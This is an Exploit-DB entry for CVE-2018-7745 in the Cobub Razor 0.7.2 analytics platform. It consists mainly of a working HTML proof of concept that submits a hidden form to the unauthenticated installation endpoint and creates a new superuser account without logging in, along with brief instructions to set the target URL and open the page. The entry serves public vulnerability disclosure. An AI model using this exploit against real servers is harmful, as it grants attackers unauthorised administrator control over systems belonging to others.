Cobub Razor 0.7.2 - Add New Superuser Account

EDB-ID: 44419
Author: ppb
Published: 2018-04-09
CVE: CVE-2018-7745
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: [2018-03-07] 
 # Exploit Author: [ppb([email protected])] 
 # Vendor Homepage: [https://github.com/cobub/razor/] 
 # Software Link: [https://github.com/cobub/razor/] 
 # Version: [0.72]  
 # CVE : [CVE-2018-7745] 
  
 There is a vulnerability that can add an admnistrator user without login. 
 update the url and save to html ,then open it. 
  
  
 <html> 
   <body> 
   <script>history.pushState('', '', '/')</script> 
     <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST"> 
       <input type="hidden" name="siteurl" value="http://127.0.0.1/" /> 
       <input type="hidden" name="superuser" value="test" /> 
       <input type="hidden" name="pwd" value="test123" /> 
       <input type="hidden" name="verifypassword" value="test123" /> 
       <input type="hidden" name="email" value="[email protected]" /> 
       <input type="submit" value="Submit request" /> 
     </form> 
   </body> 
 </html>

Source: www.exploit-db.com
Related Posts